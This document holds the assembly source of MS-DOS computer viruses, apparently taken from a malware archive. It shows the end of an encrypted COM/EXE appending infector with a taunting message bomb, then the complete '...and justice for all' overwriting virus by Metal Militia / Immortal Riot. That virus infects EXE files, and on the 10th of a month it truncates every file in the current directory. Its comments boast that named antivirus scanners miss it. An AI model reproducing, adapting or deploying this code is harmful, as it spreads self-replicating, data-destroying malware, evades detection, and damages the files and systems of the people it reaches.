mov ah,3fh ; DOS Read file
lea dx,[bp+BUFFER] ; Save the original header
mov cx,24 ; Read 24 bytes
int 21h ; Call DOS to do it
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
; Check if the file is an EXE.
CHECK_EXE: cmp word ptr [bp+BUFFER],'ZM' ; Is it an EXE?
jne CHECK_COM ; Nope, see if it's a COM
cmp word ptr [bp+BUFFER+16],ID; Is it already infected?
je ANOTHER ; Yep, so try another
jmp short INFECT_EXE ; We got one! Go infect it!
; Check if the file is COMMAND.COM
CHECK_COM: cmp word ptr [bp+DTA+35],'DN' ; Check for COMMAND.COM
jz ANOTHER ; If it is, try another file
; Now, check for previous infection by checking for our presence at
; the end of the file.
mov ax,word ptr [bp+DTA+26] ; Put total filesize in AX
cmp ax,(65535-(ENDHEAP-DECRYPT)); Check if too big
jle ANOTHER ; If so, try another
mov cx,word ptr [bp+BUFFER+1] ; Put jmp offset in CX
add cx,END_VIRUS-DECRYPT+3 ; Add virus size to jmp offset
cmp ax,cx ; Compare file size's
jnz INFECT_COM ; If healthy, go infect it
ANOTHER: mov ah,4fh ; Otherwise find another
jmp short FINDNEXT ; possible victim
END_SEARCH: retn ; No files found
;*** Subroutine INFECT_COM ***
INFECT_COM:
; Save the first three bytes of the COM file
lea si,[bp+BUFFER] ; Start of first 3 bytes
lea di,[bp+COM_START] ; Store them here
movsw ; Transfer the 3 bytes
movsb
; Calculate jump offset for header of victim so it will run virus first.
; AX has the filesize. Store new JMP and OFFSET in the buffer.
mov cx,3 ; No. bytes to write in header
sub ax,cx ; Filesize - jmp_offset
mov byte ptr [si-3],0e9h ; Store new JMP command
mov word ptr [si-2],ax ; plus offset
add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET
push ax ; Save it for later
jmp DONE_INFECTION ; We're done!
;*** Subroutine INFECT_EXE ***
INFECT_EXE:
; Save original CS:IP and SS:SP.
les ax,dword ptr [bp+BUFFER+20] ; Get original CS:IP
mov word ptr [bp+JMPSAVE],ax ; Store IP
mov word ptr [bp+JMPSAVE+2],es ; Store CS
les ax,dword ptr [bp+BUFFER+14] ; Get original SS:SP
mov word ptr [bp+STACKSAVE],es ; Store SP
mov word ptr [bp+STACKSAVE+2],ax ; Store SS
; Get get the header size in bytes.
mov ax,word ptr [bp+BUFFER+8] ; Get header size
mov cl,4 ; Convert paragraphs to bytes
shl ax,cl ; Multiply by 16
xchg ax,bx ; Put header size in BX
; Get file size.
les ax,[bp+offset DTA+26] ; Get filesize to
mov dx,es ; DX:AX format
push ax ; Save filesize
push dx
sub ax,bx ; Subtract header size
sbb dx,0 ; from filesize
mov cx,16 ; Convert to SEGMENT:OFFSET
div cx ; form
; Store new entry point (CS:IP) in header.
mov word ptr [bp+BUFFER+20],dx; Store IP
mov word ptr [bp+BUFFER+22],ax; Store CS
add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset
mov bx,dx ; Hold it for now
; Store new stack frame (SS:SP) in header.
mov word ptr [bp+BUFFER+14],ax; Store SS
mov word ptr [bp+BUFFER+16],ID; Store SP
pop dx ; Get back filesize
pop ax
add ax,END_VIRUS-START_VIRUS ; Add virus size
adc dx,0 ; to filesize
push ax ; Save AX
mov cl,9 ; Divide AX
shr ax,cl ; by 512
ror dx,cl
stc ; Set carry flag
adc dx,ax ; Add with carry
pop ax ; Get back AX
and ah,1 ; Mod 512
; Store new filesize in header.
mov word ptr [bp+BUFFER+4],dx ; Store new filesize
mov word ptr [bp+BUFFER+2],ax
push cs ; Restore ES
pop es
mov cx,24 ; No. bytes to write in header
push bx ; Save START_VIRUS offset
; Write virus to victim and restore the file's original timestamp, datestamp,
; and attributes. These values were stored in the DTA by the
; Findfirst / Findnext services.
DONE_INFECTION:
push cx ; Save no. bytes to write
xor cx,cx ; Clear attributes
call SET_ATTR ; Set attributes
mov al,2 ; DOS open file for read/write
call OPEN ; Open the file
; Write the new header at the beginning of the file.
mov ah,40h ; DOS write to file
pop cx ; Number of bytes to write
lea dx,[bp+BUFFER] ; Point to the bytes to write
int 21h ; Call DOS to do it
; Move to end of file.
mov ax,4202h ; DOS set read/write pointer
xor cx,cx ; Set offset move to zero
cwd ; Equivalent to xor dx,dx
int 21h ; Call DOS to do it
; Append virus to end of file.
mov ah,2ch ; DOS get time
int 21h ; Call DOS to do it
mov [bp+KEY],dx ; Save sec + 1/100 sec
; as the new KEY
lea di,[bp+APPEND] ; to the heap
mov cx,START_VIRUS-DECRYPT ; Number of bytes to move
mov al,53h ; Push BX and store it
stosb ; in the append routine
lea si,[bp+DECRYPT] ; Move Crypt routines
push si ; Save SI
push cx ; Save CX
rep movsb ; Transfer the data
lea si,[bp+WRITE_START] ; Now copy the write
mov cx,WRITE_END-WRITE_START ; routine to the heap
rep movsb ; Transfer the data
pop cx ; Get back
pop si ; CX and SI
rep movsb ; Recopy Crypt routine
mov ax,0c35bh ; Tack a POP BX and
stosw ; RETN on the end
pop ax ; New START_VIRUS offset
mov word ptr [bp+DECRYPT+1],ax; Store new offset
call APPEND ; Write the file
; Restore original creation date and time.
mov ax,5701h ; DOS set file date & time
mov cx,word ptr [bp+DTA+22] ; Set time
mov dx,word ptr [bp+DTA+24] ; Set date
int 21h ; Call DOS to do it
; Close the file.
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
; Restore original file attributes.
mov cx,word ptr [bp+DTA+21] ; Get original file attribute
call SET_ATTR ; Set attribute
pop bx ; Take CALL off stack
; ****** B O M B S E C T I O N ******
; Check to see if the virus is ready to activate.
; Put all activation tests and bombs here.
CONDITIONS: ; mov ah,2ah ; DOS get date
; int 21h ; Call DOS to do it
; cmp dx,1001h ; Check for Oct 1st
; jl BOMB_DONE ; Not time yet
; mov ah,2ch ; DOS get time
; int 21h ; Call DOS to do it
; cmp cl,25h ; Check for 25 min past
; jl BOMB_DONE ; Not time yet
BOMB: mov ah,3h ; BIOS find cursor position
mov bh,0 ; Video page 0
int 10h ; Call BIOS to do it
push dx ; Save original Row and Column
mov cx,6 ; Number of lines to print
lea si,[bp+VERSE] ; Location of VERSE
mov dx,080ah ; Row and Column of output
PRINTLOOP: mov ah,2h ; BIOS set cursor
int 10h ; Set cursor
push dx ; Save Row and Column
mov ah,9h ; DOS print string
mov dx,si ; Location of VERSE
int 21h ; Call DOS to print it
pop dx ; Get Row and Column
inc dh ; Increment Row
add si,54 ; Go to next line of VERSE
loop PRINTLOOP ; Print all lines
mov ah,00h ; Read character from keybd
int 16h
pop dx ; Get original Row Column
mov ah,2h ; BIOS set cursor
int 10h ; Call BIOS to do it
BOMB_DONE: jmp QUIT ; Go back to host program
VERSE: db 'ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·$'
db 'º Guess what ??? º$'
db 'º You have been victimized by a virus!!! Do not º$'
db 'º try to reboot your computer or even turn it º$'
db 'º off. You might as well read this and weep! º$'
db 'ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ',7,7,'$'
; Write routine to append the virus to the end of the file.
WRITE_START:
pop bx ; Get back file handle
push bx ; Save it again
mov ah,40h ; DOS write to file
mov cx,END_VIRUS-DECRYPT ; Length of virus
lea dx,[bp+DECRYPT] ; Start from beginning of virus
int 21h ; Call DOS to do it
WRITE_END:
; New INT 24h handler.
NEWINT24: mov al,3 ; Fail call
iret ; Return
;*** Subroutine OPEN ***
; Open a file. Takes AL as parameter.
OPEN proc near
mov ah,3dh ; DOS open file, read/write
lea dx,[bp+DTA+30] ; Point to filename we found
int 21h ; Call DOS to do it
xchg ax,bx ; Put file handle in BX
retn ; Return
OPEN endp
;*** Subroutine SET_ATTR ***
; Takes CX as a parameter
SET_ATTR proc near
mov ax,4301h ; DOS change file attr
lea dx,[bp+DTA+30] ; Point to file name
int 21h ; Call DOS
retn ; Return
SET_ATTR endp
; This area will hold all variables to be encrypted
COM_MASK db '*.com',0 ; COM file mask
EXE_MASK db '*.exe',0 ; EXE file mask
DOTDOT db '..',0 ; Go up one directory
COM_START db 0cdh,20h,0 ; Header for infected file
BACKSLASH db '\' ; Backslash for directory
START endp
END_VIRUS equ $ ; Mark end of virus code
; This data area is a scratch area and is not included in virus code.
ORIG_DIR db 64 dup(?) ; Holds original directory
OLDINT24 dd ? ; Storage for old INT 24 vector
BUFFER db 24 dup(?) ; Read buffer and EXE header
DTA db 43 dup(?) ; New DTA location
APPEND: db (START_VIRUS-DECRYPT)*2+(WRITE_END-WRITE_START)+3 dup(?)
ENDHEAP:
end MAIN
MSDOS/J-Index/Virus.MSDOS.Unknown.justice.asm
+335
View File
@@ -0,0 +1,335 @@
; Virusname: ...and justice for all
; Country : Sweden
; Author : Metal Militia / Immortal Riot
; Date : 07-29-1993
; This is an mutation of 808 virus by Skism in USA.
; Many thanks to the scratch coder of the 808 virus.
; We've tried this virus ourself, and it works just fine.
; Infects one random EXE-file every run, by overwriting it
; with the virus-code, and if the file is smaller, will "pad"
; it out to the size of the virus anyhow.
;
; McAfee Scan v105 can't find it, and
; S&S Toolkit 6.5 don't find it either.
; I haven't tried with scanners like Fprot/Tbscan,
; but they will probably report some virus structure.
;
; Best Regards : [Metal Militia]
; [The Unforgiven]
filename EQU 30 ;used to find file name
fileattr EQU 21 ;used to find file attributes
filedate EQU 24 ;used to find file date
filetime EQU 22 ;used to find file time
code_start EQU 0100h ;start of all .COM files
virus_size EQU 808 ;TR 808
code segment 'code'
assume cs:code,ds:code,es:code
org code_start
main proc near
jmp virus_start
encrypt_val db 00h
virus_start:
call encrypt ;encrypt/decrypt file
jmp virus ;go to start of code
encrypt:
push ax
mov bx,offset virus_code ;start encryption at data
xor_loop:
mov ch,[bx] ;read current byte
xor cl,encrypt_val ;get encryption key
mov [bx],ch ;switch bytes
inc bx ;move bx up a byte
cmp bx,offset virus_code+virus_size
;are we done with the encryption
jle xor_loop ;no? keep going
pop cx
ret
infectfile:
mov dx,code_start ;where virus starts in memory
mov bx,handle ;load bx with handle
push bx ;save handle on stack
call encrypt ;encrypt file
pop bx ;get back bx
mov cx,virus_size ;number of bytes to write
mov ah,40h ;write to file
int 21h ;
push bx
call encrypt ;fix up the mess
pop bx
ret
virus_code:
wildcards db "*",0 ;search for directory argument
filespec db "*.EXE",0 ;search for EXE file argument
filespec2 db "*.*",0 ;search fro all files argument
rootdir db "\",0 ;argument for root directory
dirdata db 43 dup (?) ;holds directory DTA
filedata db 43 dup (?) ;holds files DTA
diskdtaseg dw ? ;holds disk dta segment
diskdtaofs dw ? ;holds disk dta offset
tempofs dw ? ;holds offset
tempseg dw ? ;holds segment
drivecode db ? ;holds drive code
currentdir db 64 dup (?) ;save current directory into this
handle dw ? ;holds file handle
orig_time dw ? ;holds file time
orig_date dw ? ;holds file date
orig_attr dw ? ;holds file attr
idbuffer dw 2 dup (?) ;holds virus id
virus:
mov ax,3000h ;get dos version
int 21h ;
cmp al,02h ;is it at least 2.00?
jb bus1 ;won't infect less than 2.00
mov ah,2ch ;get time
int 21h ;
mov encrypt_val,dl ;save m_seconds to encrypt val so
;theres 100 mutations possible
setdta:
mov dx,offset dirdata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h ;
newdir:
mov ah,19h ;get drive code
int 21h ;
mov dl,al ;save drivecode
inc dl ;add one to dl, because functions differ
mov ah,47h ;get current directory
mov si, offset currentdir ;buffer to save directory in
int 21h ;
mov dx,offset rootdir ;move dx to change to root directory
mov ah,3bh ;change directory to root
int 21h ;
scandirs:
mov cx,13h ;include hidden/ro directorys
mov dx, offset wildcards ;look for '*'
mov ah,4eh ;find first file
int 21h ;
cmp ax,12h ;no first file?
jne dirloop ;no dirs found? bail out
bus1:
jmp bus
dirloop:
mov ah,4fh ;find next file
int 21h ;
cmp ax,12h
je bus ;no more dirs found, roll out
chdir:
mov dx,offset dirdata+filename;point dx to fcb - filename
mov ah,3bh ;change directory
int 21h ;
mov ah,2fh ;get current dta address
int 21h ;
mov [diskdtaseg],es ;save old segment
mov [diskdtaofs],bx ;save old offset
mov dx,offset filedata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h ;
scandir:
mov cx,07h ;find any attribute
mov dx,offset filespec ;point dx to "*.COM",0
mov ah,4eh ;find first file function
int 21h ;
cmp ax,12h ;was file found?
jne transform
nextexe:
mov ah,4fh ;find next file
int 21h ;
cmp ax,12h ;none found
jne transform ;found see what we can do
mov dx,offset rootdir ;move dx to change to root directory
mov ah,3bh ;change directory to root
int 21h ;
mov ah,1ah ;set dta address
mov ds,[diskdtaseg] ;restore old segment
mov dx,[diskdtaofs] ;restore old offset
int 21h ;
jmp dirloop
bus:
jmp rollout
transform:
mov ah,2fh ;temporally store dta
int 21h ;
mov [tempseg],es ;save old segment
mov [tempofs],bx ;save old offset
mov dx, offset filedata + filename
mov bx,offset filedata ;save file...
mov ax,[bx]+filedate ;date
mov orig_date,ax ;
mov ax,[bx]+filetime ;time
mov orig_time,ax ; and
mov ax,[bx]+fileattr ;
mov ax,4300h
int 21h
mov orig_attr,cx
mov ax,4301h ;change attributes
xor cx,cx ;clear attributes
int 21h ;
mov ax,3d00h ;open file - read
int 21h ;
jc fixup ;error - find another file
mov handle,ax ;save handle
mov ah,3fh ;read from file
mov bx,handle ;move handle to bx
mov cx,02h ;read 2 bytes
mov dx,offset idbuffer ;save to buffer
int 21h ;
mov ah,3eh ;close file for now
mov bx,handle ;load bx with handle
int 21h ;
mov bx, idbuffer ;fill bx with id string
cmp bx,02ebh ;infected?
jne doit ;same - find another file
fixup:
mov ah,1ah ;set dta address
mov ds,[tempseg] ;restore old segment
mov dx,[tempofs] ;restore old offset
int 21h ;
jmp nextexe
doit:
mov dx, offset filedata + filename
mov ax,3d02h ;open file read/write access
int 21h ;
mov handle,ax ;save handle
call infectfile
;mov ax,3eh ;close file
;int 21h
rollout:
mov ax,5701h ;restore original
mov bx,handle ;
mov cx,orig_time ;time and
mov dx,orig_date ;date
int 21h ;
mov ax,4301h ;restore original attributes
mov cx,orig_attr
mov dx,offset filedata + filename
int 21h
;mov bx,handle
;mov ax,3eh ;close file
;int 21h
mov ah,3bh ;try to fix this
mov dx,offset rootdir ;for speed
int 21h ;
mov ah,3bh ;change directory
mov dx,offset currentdir ;back to original
int 21h ;
mov ah,2ah ;check system date
int 21h ;
cmp cx,1993 ;is it at least 1993?
jb audi ;no? don't do it now
cmp dl,10 ;is it the 10th?
jne audi ;not yet? quit
mov dx,offset dirdata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h ;
mov ah,4eh ;find first file
mov cx,7h ;
mov dx,offset filespec2 ;offset *.*
Loops:
int 21h ;
jc audi ;error? then quit
mov ax,4301h ;find all normal files
xor cx,cx ;
int 21h ;
mov dx,offset dirdata + filename
mov ah,3ch ;fuck up all files in current dir
int 21h ;
jc audi ;error? quit
mov ah,4fh ;find next file
jmp loops ;
audi:
mov ax,4c00h ;end program
int 21h ;
; Time changes, and so does the text..sorry Skism :)
; but hey! Isn't this message much fanicer then the old ?
; Yeah, right, Metal Up Your Ass!
words_ db " Metal Militia / Immortal Riot",0
words2 db " ...and Justice for all",0
words3 db " Justice is lost",0
db " Justice is raped",0
db " Justice is gone",0
db " Pulling your strings",0
db " Seeking no truth",0
db " Winning is all",0
db " Find it so Grim",0
db " so true",0
db " so real",0
; heh..what a lucky dog I'm, the new virus turned out to be 808 bytes,
; which means exactly like the old one..(used tlink2 /t).
main endp
code ends
end main